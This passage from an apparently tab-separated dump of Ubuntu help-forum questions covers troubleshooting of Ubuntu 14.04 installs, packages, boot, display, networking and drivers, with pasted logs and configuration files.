'org.freedesktop.geoclue.error.notavailable : geoclue master client has no usable address providers' /usr/lib/python2.7/dist-packages/gi/overrides/glib.py:535 : warning : source id 20 was not found when attempting to remove it return super ( maincontext , self ) .iteration ( may_block ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 665 was not found when attempting to remove it glib.source_remove ( self._timeout ) 2014-05-04 16:07:31,910 - softwarecenter.db.utils - info - software-center-agent finished with status 0 /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 686 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 697 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 706 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 715 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 724 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 739 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 748 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 757 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 766 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 802 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 813 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 822 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 831 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 843 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 852 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 861 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 870 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 879 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 889 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 902 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 934 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 943 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 952 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 961 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 977 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 999 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 1008 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 1017 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 1026 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 1039 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 1049 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 1058 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 1071 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 1080 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 1089 was not found when attempting to remove it glib.source_remove ( self._timeout ) /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 1098 was not found when attempting to remove it glib.source_remove ( self._timeout ) traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/viewswitcher.py '' , line 149 , in config_view pane = vm.set_active_view ( view_id ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 150 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/installedpane.py '' , line 143 , in init_view self.oneconf_handler = get_oneconf_handler ( self.oneconf_viewpickler ) file `` /usr/share/software-center/softwarecenter/backend/oneconfhandler/__init__.py '' , line 32 , in get_oneconf_handler oneconf_handler = oneconfhandler ( oneconfviewpickler ) file `` /usr/share/software-center/softwarecenter/backend/oneconfhandler/core.py '' , line 56 , in __init__ self.oneconf = dbusconnect ( ) file `` /usr/lib/python2.7/dist-packages/oneconf/dbusconnect.py '' , line 152 , in __init__ hosts_object_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 241 , in get_object follow_name_owner_changes=follow_name_owner_changes ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 248 , in __init__ self._named_service = conn.activate_name_owner ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 180 , in activate_name_owner self.start_service_by_name ( bus_name ) file `` /usr/lib/python2.7/dist-packages/dbus/bus.py '' , line 278 , in start_service_by_name 'su ' , ( bus_name , flags ) ) ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : process /usr/share/oneconf/oneconf-service exited with status 1 /usr/share/software-center/softwarecenter/ui/gtk3/widgets/exhibits.py:404 : warning : source id 1110 was not found when attempting to remove it glib.source_remove ( self._timeout )
460546	use x11 mouse pointer in wine applications	i 'm using ms office 2007 with wine on my kubuntu 13.04 . however , the mouse pointer looks like this : i 'd prefer it to keep the mouse pointer managed by the xserver : ( here kde oxygen blue theme ) is this even possible and if yes , how ?
460547	redirecting to error page while submitting ubuntu touch app	i 'm writing an application for ubuntu for phones and i submitted my .click package to ubuntu store 'myapp ' portal , after uploading it goes for scanning , but after scanning automatically it is redirecting to an error page with error code '404 page not found ' . i have submitted my apps before in this same way , but this time i am facing this issue , please help me out if anyone knows what exactly happening .
460548	any file manager for accessing files of linux from windows ?	any file manager for windows that can read ext formatted disk ?
460551	burg for ubuntu 14.04 trusty	as the title.. how do i do that ? i really want that.. but ingalex has removed the folder.. making sudo apt-get update show a error like this w : failed to fetch http : //ppa.launchpad.net/ingalex/super-boot-manager/ubuntu/dists/trusty/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/ingalex/super-boot-manager/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
460553	14.04 unity is very slow and unuseable	14.04 very slow after install 12.04 faster . amd sempron 1.5 2gig ram 250 hd gforce fx 5500.video card 256 agp x8 whats wrong . ?
460557	installing openfoam 2.3 on ubuntu 14.04	there is currently no package for ubuntu 14.04 trusty at http : //www.openfoam.org/download/ubuntu.php . if i try to use the package for 13.10 saucy aptitude gives me an error when i try sudo aptitude install openfoam230 paraviewopenfoam410 [ snipped long list of dependencies ] the following packages have unmet dependencies : openfoam230 : depends : libboost-thread1.53.0 which is a virtual package . depends : libopenmpi1.3 which is a virtual package . the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) openfoam230 [ not installed ] until an official package becomes available , is there a way around this without installing from source ?
460559	how to block ip forwarding for specific remote ip address	i use ubuntu as gateway for several hosts . i need advise how to block ip forwarding for specific ip address or specific ip range ? i tried to block ip via ufw deny rules , but it looks like ip forwarding settings can not be modified via rules and it can be applied only globally ( default_forward_policy in /etc/default/ufw )
460560	wireless on computer	just to point out , i am new to computers . i have a hp pavilion dual booting winxp and ubuntu 14.04 . ubuntu does not know that my wireless usb stick in the drive . my internet provider is comcast . thank you in advance .
460561	live usb boot failure : `` no default or ui configuration directive found ''	i 'm new , so i beg your pardon from the outset . i 've reviewed a few other people 's questions who had the same problem . i 'm an utter noob to linux and would love to give it a try . hence the bootable usb . i 've been using universal usb installer and unetbootin . i 've changed the name of the folder , .bin and .cfg files to syslinux , syslinux.bin , syslinux.cfg . i 've allowed unetbootin to download another copy of the iso to install , with the same results as above . i 've tried formatting my usb 's in command prompt to fat or fat16 , however to no avail . it said something about the usb being too big ? i did this with both a 32gb usb and an 8gb usb . both with the same results . how can i fix this please ?
460564	package dependencies can not be resolved when installing totem	package dependencies can not be resolved when installing totem and i get this in details : totem : depends : python : any ( > = 2.7.1-0ubuntu2 ) but it is a virtual package depends : libnautilus-extension1a ( > = 1:2.91 ) but 1:3.10.1-0ubuntu8 is to be installed depends : libtotem0 ( > = 3.10.1-1ubuntu4 ) but 3.10.1-1ubuntu4 is to be installed depends : totem-common ( = 3.10.1-1ubuntu4 ) but 3.10.1-1ubuntu4 is to be installed i have found out that my problem is libtotem0 . i have an old version installed . when i mark it in synaptic for upgrade and apply , it says that i have broken packages . how can i find out which ones are broken and fix them ? here is my sources.list . strange it says saucy , but i installed trusty . # deb cdrom : [ ubuntu 13.04 _raring ringtail_ - release amd64 ( 20130424 ) ] / raring main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu trusty main restricted deb-src http : //archive.ubuntu.com/ubuntu trusty main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu trusty-updates main restricted deb-src http : //archive.ubuntu.com/ubuntu trusty-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu trusty universe deb-src http : //archive.ubuntu.com/ubuntu trusty universe deb http : //archive.ubuntu.com/ubuntu trusty-updates universe deb-src http : //archive.ubuntu.com/ubuntu trusty-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu trusty multiverse deb-src http : //archive.ubuntu.com/ubuntu trusty multiverse deb http : //archive.ubuntu.com/ubuntu trusty-updates multiverse deb-src http : //archive.ubuntu.com/ubuntu trusty-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu trusty-backports main restricted universe multiverse deb-src http : //archive.ubuntu.com/ubuntu trusty-backports main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu trusty-security main restricted deb-src http : //archive.ubuntu.com/ubuntu trusty-security main restricted deb http : //archive.ubuntu.com/ubuntu trusty-security universe deb-src http : //archive.ubuntu.com/ubuntu trusty-security universe deb http : //archive.ubuntu.com/ubuntu trusty-security multiverse deb-src http : //archive.ubuntu.com/ubuntu trusty-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu trusty partner # deb-src http : //archive.canonical.com/ubuntu raring partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu trusty main deb-src http : //extras.ubuntu.com/ubuntu trusty main # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . # # major bug fix updates produced after the final release of the # # distribution . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # # deb http : //archive.canonical.com/ubuntu raring partner # deb-src http : //archive.canonical.com/ubuntu raring partner # # this software is not part of ubuntu , but is offered by third-party deb http : //deb.opera.com/opera/ stable non-free # deb-src http : //deb.opera.com/opera/ stable non-free # # developers who want to ship their latest software .
460565	how to debug dual stream 'n ' wifi connectivity ?	i have an asus ac56u 2x2 router . all my laptops are connecting on the 2.4ghz band at 20mhz not 40mhz dual channel . max link reported by windows and by linus is 144mbps . what linux tools can i use to find out what my laptop wifi card is doing in terms of key encryption , band , channels , frequency . i 've used nm-tool and ifconfig and but they do n't tell me all the info like freq ( 20 or 40 ) or channel numbers i 'm using ubuntu saucy with a bcm4352 80211ac wifi chip with proprietary wl module the router is setup 20/40 but i 've also tried auto and just 40 . encryption is wpa2/aes
460571	i have installed xfce on ubuntu 13.10 , but now icons and colors in unity is strange . how to fix ?	i wanted to install xubunutu looks on my ubuntu machine and i have done it like so : sudo apt-get install xubuntu-desktop but now when i have restarted the machine , i first got xubuntu log-out scree . when i got back to the login screen , i got xfce ( xubuntu ) login screen , and even i login to the unity , i have xfce icons set up and the colors of the menu . like this what i would like is to have a ubuntu like login screen , and the ubuntu looks when i login to ubunty ( unity ) and not some mixed xfce-ubunty experience . i have tried sudo apt-get update sudo apt-get install -- reinstall ubuntu-desktop sudo apt-get install unity and dconf reset -f /org/compiz/ unity -- reset-icons but it did n't work . can someone help me how to return the original ubuntu looks when i get to the login screen and when i login to unity ui ?
460580	laptop struggling with firefox	i just installed 14.04 and my laptop is struggling bad with firefox . scrolling is laggy and sometimes it pauses for e couple of seconds and the screen darkens for a moment . also the keyboard response is often slow . this happened in 13.04 as well , but this is a clean install and firefox 29 is running with only adblock , lastpass and the pre-installed add-ons . some info on the laptop : dell inspiron 1564 , i3 m 350 dual core @ 2.27ghz , 4 gb ram cpu temp ranges from 40 - 50c . my question is why and can i do anything to make it smoother ?
460582	desktop sharing ubuntu 14.04	i can not connect to my ubuntu 14.04 desktop via vnc . the error states `` unable to connect to vnc server using you chosen security settings . either upgrade ... '' i checked my old ubuntu 12.04 desktop & the settings are exactly the same . any idea how to resolve this issue ?
460583	hp elitebook 2740p touch/pen calibration ( xubuntu 14.04 )	i recently invested in an hp elitebook 2740p , and i 'm in love with it so far . the only problem i 've encountered so far is screen calibration . my version of the 2740p has a screen which features both digitizer pen control and multi-touch control ( much like the microsoft surface ) . after a bit of use , i noticed that although the multi-touch control is fairly accurate , the digitizer pen is about 1mm off in the corners . so , i set off about calibrating it . i installed and ran xinput-calibration . i had to specify the digitizer pen to it , because it defaults to the multi-touch interface . i then dumped the calibration results into /usr/share/x11/xorg.conf.d/10-evdev.conf in the `` evdev tablet catchall '' section . thinking i 've done everything right , i saved the file and restarted . no difference . it seems like the calibration values did n't take at all . so , i 'm now pretty lost and could use any guidance you might have for me .
460584	long start-up time	i have just installed ubuntu 14.04 on my laptop , which originally had windows 7 installed . i 've opted for ubuntu through grub , but it takes the system as long as 4 minutes to successfully boot .
460591	ubuntu 14.04 screen corruption on live desktop ( amd 7970 )	ubuntu boots to desktop from the usb stick . there is no wallpaper , just black . the bar at the top of the screen is there and the launcher on the left . i can search in the dash , things look ok. any program that is started results in a garbled screen . this is very odd , i have been using ubuntu since 2006 and have it installed without error on my laptop . i have had many linux distros installed on this desktop and have never seen this error . i will record this and post it to youtube see if we ca n't get some answers ... here is a video of this error https : //www.dropbox.com/s/7yknbxlvqz19fx7/2014-05-04 % 2013.58.38.mp4
460593	ubuntu 12.04 - postfix - postmap missing	i 'm trying to change the default sender address on postfix using the method described in how to change default email address for postfix ? at some point we are required to run postmap , but the command is nowhere to be found and no package is providing it . has it been rendered obsolete ? how are we suppose to generate db files than ?
460599	how can i see my 'held ' packages ?	i have a bunch of held packages . i tried apt-mark showhold but it returns nothing . synaptic and software upgrade tell me that i have held packages . how do i find them and unhold them . this stopping me from fixing broken packages .
460600	unable to mount home-directory for user after fresh install 14.04	i performed an fresh install of ubuntu 14.04 . i have /home on a different partition from root . installing 14.04 and mounting /home went without any problem . during installation i was asked to make a user and i made a new user with my user-name and password . my home folder was correctly added to my user-name . after this i made users for my different family members and adding their existing home folder which went fine except for one . in one case i could make the new user , same user-name as the home folder . login for this user failed . the screen turns black and one would expect the desktop for this user to appear . i can hear the drum-sound which indicates that you are logged in , but the login-screen returns . i am unable to login for this one user . if i try to login this user in cli everything is fine . i can browse the home folder and files . of course i do n't want to loose the home folder for this user . what should i do ? thanks in advance .
460601	uninstalling svn failed	i want to uninstall svn from my linux server but it failed somehow i runned command sudo apt-get remove subversion and the result is e : unable to write to /var/cache/apt/ e : the package lists or status file could not be parsed or opened . my linux version is distrib_id=ubuntu distrib_release=10.04 distrib_codename=lucid distrib_description= '' ubuntu 10.04.3 lts '' what i have to do to uninstall svn ( subversion )
460604	grub rescue after trying a reinstall ( parallel boot with windows 7 )	i had windows 7 one disk . then i installed ubuntu on a different disk . that went fine . but for various reasons , i wanted to reinstall ubuntu . so i booted my install disk and chose something akin to `` reinstall ubuntu and remove files '' ( not the one that 'd also remove windows 7 files ) . well , the installation seemed to go just fine , but after it , i ca n't boot into either os . all i 'm met with is a prompt for `` grub rescue '' , help !
460605	line 9 fstab is bad	when i boot linux it says line 9 is bad , this is my fstab can you see any thing wrong with it . i have an ssd hard drive . i only have one hard drive . i added the commands discard , noatime , nodiratime , i also have a macosx boot partition im using a macbook . i wanted to say every thing seems to work fine . # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda3 during installation uuid=1fada98a-c9b4-4ffd-b484-5b15e84f909f / ext4 discard , noatime , nodiratime , errors=remount-ro 0 1 # /boot/efi was on /dev/sda1 during installation uuid=70d6-1701 /boot/efi vfat defaults 0 1 # swap was on /dev/sda4 during installation uuid=043e6583-089e-449c-984f-c8e09e6acee6 none swap sw 0 0 /dev/sr0 /media/cdrom0 udf , iso9660 user , noauto 0 0 tmpfs /tmp tmpfs defaults , noatime , mode=1777 0 0
460606	unity lock screen issue	i upgraded from ubuntu 13.10 to 14.04 and i still have the old lock screen . how do i change to the new one ? there was a compiz option to change between the two of them but it was removed in the last update : ( i use 64 bit version of trusty .
460608	shairport on ubuntu 14.04	anyway to get work latest shairport on ubuntu 14.04 64 bit desktop ? i tried nearly all tutorials . no success . it opens application , says listening connections . but not visible in network
460609	how can i install typing break on ubuntu 14.04 lts ?	i want to install typing break on ubuntu 14.04 . so i found an excellent post about it : how can i install typing break ? but unfortunately the given information is only for 11.10 ( and i have 14.04 . so i tried to follow the instructions and i added the following repositories through software updater : deb http : //ppa.launchpad.net/drwright/stable/ubuntu precise main deb-src http : //ppa.launchpad.net/drwright/stable/ubuntu precise main* and run sudo apt-get update sudo apt-get install drwright everything went without any errors . after all i log out . but there is no typing break in system settings . please help me to install typing break on ubuntu 14.04 . i need it badly ! thanks sorry , but i do not understand why this question was marked as a duplicate . i could n't install typing break on ubuntu 14.04 . it did n't work ! but i did n't have any problems with installation on ubuntu 12.02 . this answer how can i install typing break ? does n't explain how to solve this problem . this question is not a duplicate ! could , please , somebody help me install typing break on ubuntu 14.04 ?
460611	how do i log in as root ?	how do i log in as root ? i ca n't do aptitude unless i am root . i have broken / held packages that i ca n't install .
460618	how to fix wine gecko error while installing something from winetricks	how to fix this when trying to install something through winetricks sha1sum mismatch ! rename < ~ > /.winetrickscache/./wine_gecko-0.1.0.cab and try again .
460620	vlc does n't work properly on ubuntu 14.04	i 've installed vlc but when i try to open it no window pops up , only the icon shows up on the taskbar . furthermore when i open video files there is only sound and no picture .
460621	dual boot two instances ubuntu server 14.04	i want to dual boot two instances of ubuntu server 14.04 . i want to do this that way i can work on a website for my school , as well as have a space for me to develop that is completely sandboxed from one another and both hosted on port 80 . ( i do not need them running at the same time ) based on the research that i have done , i believe that this is the only way to do this , but if you have any other suggestions , i would be glad to hear it . i am not sure how to dual boot in the installation of the server because i am not used to how it looks . do i have to partition it in the first installation or the second ? how do i partition it ? are there any videos that i should refer to that might be able to guide me through it ?
460623	ubuntu 14.04 installation hangs despite of -- forcepae option	trying to install the new ubuntu 14.04 on my old laptop i got the message : *error : pae is disabled on this pentium m ( pae can potentially be enabled with kernel parameter `` forcepae '' - this is unsupported , may cause unkown problems , and will taint the kernel ) this kernel requires the following features not present on the cpu : pae unable to boot - please use a kernel appropriate for your cpu* the laptop is a toshiba satellite m30x-124 , with a 1.8 ghz pentium m ( i think its a banias type one ) and 2 gb of ram . i have therefore tried the -- forcepae option via pressing tab during boot , f6 followed by esc , selecting `` install ... '' and adding the forcepae flag . i then see an `` ubuntu '' -logo in the middle of the screen and dots changing color below that . only minutes later the dots stop changing color , the dvd spins down and the system stops doing anything . i 've also tried booting up the live-system with and without the forcepae-option but always failed . does anyone have an idea how i can get ubuntu 14.04 installed on the system ? by the way , i do n't have any other linux system running and since i do n't want any dual-boot on that laptop , i 've already wiped the old windows installation and cleared all partitions on the hdd so that the ubuntu-installer can partition the hdd the way it may suit best . thanks a lot for any help you can give me !
460625	ubuntu server periodically unreachable	i have an ubuntu server 14.04 server running . the server has two nics and acts as a nat router , with the help of shorewall . shorewall also acts as a plain firewall for blocking ports that i do n't want to be open . the way things are set up , server accepts ssh connections and replies to pings on its external/internet-facing nic . shorewall is configured to allow both these kinds of traffic , and all of this it works - sometimes . however , pretty often - at irregular intervals - the server stops responding to any kind of outside network traffic . that means pings time out ( no response ) , no new ssh connections can be established , and established connections are dropped . i can not find anything about this in my sylog , kern.log or shorewall.log . what could this vaguely defined behavior be ? where should i start looking for errors ? what i tried so far : am i using the right host name/ip address ? yes ! i am running no-ip 's ddns client named noip2 . i am using the noip hostname to contact my server . additionally , i 've observed that the server 's external ip did not change , since dhclient logs ( to syslog ) that its ip lease is extended every so often . is my isp to blame ? not as far as i can tell . in fact , i have a technical contact over there , and he reassured me that there was no service outage of any kind . i have also used a vpn to get away from the place that i usually connect to the server from . that did n't help either .
460626	to run a dialog box as a result of clicking a button in quickly using python	i am developing an application that has various buttons such as addition , multiplication and so on.. now when i click on addition button i want a dialog box to be displayed that has labels n text inputs ( design part ) . i am facing a problem with linking that dialog box to the button.. please tell me step by step how to initialize it and what should be written under this : def on_addition_clicked ( self , widget ) :
460627	does anyone know how to get a blue tiki microphone working in ubuntu 14.04 ?	i 'm trying to use this blue tiki microphone for my youtube channel . i tried every setting in audacity . i went to my sound settings . none of these help . so can someone help me out please ?
460629	what packages do i need to add the functionality of nodezero ?	nodezero is a distribution optimized for penetration testing and security auditing specialist tools nodezero comes around 300 tools for penetration testing and set of basic services which are needed in penetration testing . which packages exactly are installed there by default , that are'nt on ubuntu desktop ? or how can i find out ?
460631	struggling with wireless	i am brand new to lubuntu.i recently posted a question regarding the inability to connect wirelessly to the internet . that question was marked as a duplicate so i am reposting hoping to find additional help as the post i was referred offered no solution to my issue . i went through the steps in previous posts with no help to the problem . i am using a dell d630 laptop with a broadcom wireless bcm4311 card . i would appreciate any help anyone has to offer .
460632	make hud less time	i am using the `` alt '' key very often , and i do like the hud and want to keep both . but is there a way to make the hud active with less time . i do n't know how it is now , but if it was 0.5 seconds , then i would change it to 0.2 or so . is this possible ? sorry , for being unclear , it 's really hard to word this . this is my problem , i always use `` alt + d '' in chrome to access the url bar , and then hud annoyingly pops up . is there a way to make it work like when pressing `` alt+tab '' but with `` alt+d '' ? or edit the timer for how long i have to press until it wo n't pop up ?
460634	stop automatically changing workspaces when switching to an opened application	in the following picture , if you switch to the web browser , then switch to gedit again by clicking on the icon on the launch bar on the left , the workspace will switch automatically to the workspace below . this is very frustrating when , for example , you are processing some data from one application , and typing it in another application . without removing workspaces altogether , is there a way to disable this automatic workspace switching but still allow manual switching ?
460638	xubuntu 14.04 wo n't boot into graphical mode	i 'm not sure what i did , but from one moment to the other xubuntu wo n't boot into graphical mode anymore . it boots and asks me for my user name and password in text mode and i then use startx for starting x ( lol ) . i want it to just boot into graphical mode as it has always done . anyone who would know what 's going on ? thaaanks ! !
460640	input/output error during write on /dev/sdb during ubuntu installation	i am trying to install ubuntu 14.04 on a clean hard drive but it gives an error : input/output error during write on /dev/sdb what should i do to fix it ? thanks in advance i have n't tried anything as i am a newbie .
460644	compile evolution development snapshot 3.13.1	i have downloaded evolution development snapshot from this link : https : //wiki.gnome.org/apps/evolution and now i have trouble compiling the source code . i am using ubuntu 14.04 and this version of evolution needs newer packages which are not available on ubuntu 14.04 repository ( at least i did not find ) . how could i find and install those dependencies without messing up my packages ? output from auto-apt run ./configure mehdix @ werkstatt : ~/downloads/evolution-3.13.1 $ auto-apt run ./configure entering auto-apt mode : ./configure exit the command to leave auto-apt mode . checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking whether make supports nested variables ... yes checking for style of include used by make ... gnu checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking dependency style of gcc ... gcc3 checking for supported compiler flags ... -wall -wextra -wdeprecated-declarations -wno-missing-field-initializers -wno-sign-compare -wno-unused-parameter -wdeclaration-after-statement -werror-implicit-function-declaration -wformat-security -winit-self -wmissing-declarations -wmissing-include-dirs -wmissing-noreturn -wnested-externs -wpointer-arith -wredundant-decls -wundef -wwrite-strings checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu checking whether to enable maintainer-specific portions of makefiles ... yes checking for gcc ... ( cached ) gcc checking whether we are using the gnu c compiler ... ( cached ) yes checking whether gcc accepts -g ... ( cached ) yes checking for gcc option to accept iso c89 ... ( cached ) none needed checking dependency style of gcc ... ( cached ) gcc3 checking for inline ... inline checking how to run the c preprocessor ... gcc -e checking whether gcc and cc understand -c and -o together ... yes checking whether ln -s works ... yes checking whether make sets $ ( make ) ... ( cached ) yes checking for gawk ... ( cached ) mawk checking for perl ... /usr/bin/perl checking for pkg-config ... /usr/bin/pkg-config checking pkg-config is at least version 0.16 ... yes checking whether nls is requested ... yes checking for intltool > = 0.40.0 ... 0.50.2 found checking for intltool-update ... /usr/bin/intltool-update checking for intltool-merge ... /usr/bin/intltool-merge checking for intltool-extract ... /usr/bin/intltool-extract checking for xgettext ... /usr/bin/xgettext checking for msgmerge ... /usr/bin/msgmerge checking for msgfmt ... /usr/bin/msgfmt checking for gmsgfmt ... /usr/bin/msgfmt checking for perl ... /usr/bin/perl checking for perl > = 5.8.1 ... 5.18.2 checking for xml : :parser ... ok checking how to print strings ... printf checking for a sed that does not truncate output ... /bin/sed checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for fgrep ... /bin/grep -f checking for ld used by gcc ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking for bsd- or ms-compatible name lister ( nm ) ... /usr/bin/nm -b checking the name lister ( /usr/bin/nm -b ) interface ... bsd nm checking the maximum length of command line arguments ... 1572864 checking whether the shell understands some xsi constructs ... yes checking whether the shell understands `` += '' ... yes checking how to convert x86_64-unknown-linux-gnu file names to x86_64-unknown-linux-gnu format ... func_convert_file_noop checking how to convert x86_64-unknown-linux-gnu file names to toolchain format ... func_convert_file_noop checking for /usr/bin/ld option to reload object files ... -r checking for objdump ... objdump checking how to recognize dependent libraries ... pass_all checking for dlltool ... no checking how to associate runtime and link libraries ... printf % s\n checking for ar ... ar checking for archiver @ file support ... @ checking for strip ... strip checking for ranlib ... ranlib checking command to parse /usr/bin/nm -b output 